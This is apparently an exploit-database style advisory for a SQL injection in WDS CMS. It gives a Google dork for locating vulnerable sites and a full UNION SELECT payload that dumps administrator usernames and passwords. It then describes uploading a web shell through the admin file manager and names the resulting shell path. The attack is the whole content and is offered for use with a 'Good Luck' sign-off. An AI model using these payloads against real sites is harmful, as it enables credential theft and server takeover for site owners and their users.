# ( In The Name Of ALLAH ) # Exploit Title : WDS CMS - SQL Injection # Google Dork : allinurl:wds_news/article.php?ID= # Date : 2015-08-09 # Exploit Author : Ismail Marzouk # Vendor Homepage : http://webdesignskolan.se/ # Tested on : Windows 7 Exploit : http:// [Target]/wds_news/article.php?ID=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+cms_admin-- Upload Shell : http://[Target]/wds_news/admin.php?mode=list_file Shell Path :http://[Target]/wds_news/filer/shell.php # #### #### #### #### #### #### #### #### # # Facebook Profile : www.fb.com/ism.marzouk # #### #### #### #### #### #### #### #### # Good Luck ^__^
体验盒子
